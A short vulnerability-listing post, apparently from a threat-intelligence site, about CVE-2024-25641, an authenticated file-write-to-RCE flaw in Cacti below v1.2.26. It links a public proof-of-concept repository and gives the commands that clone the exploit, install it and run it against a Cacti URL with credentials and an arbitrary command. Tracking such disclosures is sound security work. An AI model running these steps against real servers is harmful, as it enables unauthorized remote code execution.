Skip to content
Sign In Subscribe
Vulnerabilities

CVE-2024-25641 - Fully automated PoC - RCE - Cacti < v1.2.26

 and  Dark Web Informer
1 min read

GitHub: https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26
Last Commit: August 30th, 2024

CVE-2024-25641 - Cacti 1.2.26 - Arbitrary file write to RCE 🌵

  •  Authenticated RCE
  •  Cacti version < v1.2.26

Summary

An arbitrary file write vulnerability, exploitable through the "Package Import" feature, allows authenticated users having the "Import Templates" permission to execute arbitrary PHP code on the web server (RCE).

Proof Of Concept

Usage

git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26

pip install -r requirements.txt

python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'

With poetry

git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26

poetry install

poetry run python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'

Related

Latest